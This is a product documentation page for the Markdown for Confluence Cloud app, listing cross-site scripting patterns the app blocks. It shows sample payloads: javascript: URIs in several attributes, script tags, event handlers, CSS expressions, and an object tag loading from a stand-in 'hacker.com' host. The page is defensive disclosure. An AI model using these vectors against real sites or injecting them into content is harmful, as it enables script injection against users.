List of security vulnerabilities prevented - Cloud
The Markdown for Confluence Cloud app addresses certain security issues by default. This page illustrates the issues that are prevented from occurring when using the Cloud version of the app.
Usage of <a> tag with the ahref attribute:
<a href='javascript:alert("Test");'>Test 1</a> <a href='javascript:alert("Test Vulnerability through a href unicode");'>Test 2</a> (or) [javascript:alert('Test Vulnerability through a href');]
Usage of Javascript:
<script>alert('Test Vulnerability through script');</script>
Usage of script with include:
<script type="text/javascript" src="https://<somesite>/include.js"></script>
Usage of iframe with include:
<iframe src="https://bobswift.atlassian.com"></iframe>
Usage of onXxx events irrespective of the tags:
<div style="padding: 20px; opacity: 0;height: 20px;" onmouseout="alert('Test Vulnerbility through onXxx events')"></div> <img src="smiley.gif" alt="Smiley face" height="42" width="42" onerror="alert('No file found')">
Usage of script in the src attribute:
<img src="javascript:alert("XSS");"> <img dynsrc="javascript:alert('XSS')"> <img lowsrc="javascript:alert('XSS')"> <input type="image" src="javascript:alert('XSS');">
Usage of script in the background attribute:
<body background="javascript:alert("XSS")"> <table background="javascript:alert('XSS')"> <td background="javascript:alert('XSS')">
Usage of link tag with href:
<link rel="stylesheet" href="javascript:alert('XSS');">
Usage of script in the style attribute:
<div style="background-image: url(javascript:alert('XSS'))"> <div style="width: expression(alert('XSS'));">
Usage of object with include:
<object type="text/x-scriptlet" data="http://hacker.com/xss.html">
Confluence®, Jira®, Atlassian Bamboo®, Bitbucket®, Fisheye®, and Atlassian Crucible® are registered trademarks of Atlassian®
Copyright © 2005 - 2024 Appfire | All rights reserved. Appfire™, the 'Apps for makers™' slogan and Bob Swift Atlassian Apps™ are all trademarks of Appfire Technologies, LLC.